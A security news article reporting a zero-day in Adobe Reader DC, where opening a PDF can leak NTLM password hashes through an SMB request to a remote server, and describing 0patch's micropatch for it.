A micropatch has been made available to resolve a zero-day vulnerability impacting Adobe Reader which could lead to the theft of hashed password values.
The vulnerability was originally disclosed by Alex Inführ on 26 January and proof-of-concept (PoC) code has been published.
The exploit does not rely on a software error or specific vulnerability. Instead, attackers leverage weaknesses in a content embedding feature for PDF files, according to 0patch.
In this case, the problem lies within Adobe Reader DC and, if exploited, permits attackers to force a PDF file to automatically sent an SMB request to a threat actor’s server the moment a document is opened.
This, in turn, allows the remote theft of an NTLM hash included in the SMB request. By “phoning home,” attackers are able to steal these hashed password values as well as become alerted the moment the document is opened.
The zero-day is “functionally identical” to CVE-2018-4993, according to the researchers — but is simply in a different place.
“While Bad-PDF used an /F entry to load a remote file, this issue exploits loading a remote XML stylesheet via SMB,” 0patch says. “Interestingly, if the document tries to do so via HTTP, there is a security warning there. However, when using a UNC path (the type of path that denotes a resource in a shared folder), the loading occurs without a warning.”
0patch says that the latest version of Adobe Reader DC, version 2019.010.20069, is impacted and it is likely older variants are affected in the same way.
TechRepublic: How to use SSH to proxy through a Linux jump host
The micropatch alerts users by showing a security warning when a remote stylesheet is being loaded via UNC and the source code is available via 0patch. The video below shows the fix in action:
We can expect to see official security updates released later today due to Adobe’s standard patch schedule.
In January, Adobe resolved a selection of security flaws in Adobe Connect and Digital Editions, including information disclosure problems and privileged session exposure.
The standard security update was one of three releases during the month and was accompanied by an out-of-bounds patch to squash Adobe Experience Manager and Adobe Experience Manager Forms cross-site scripting bugs.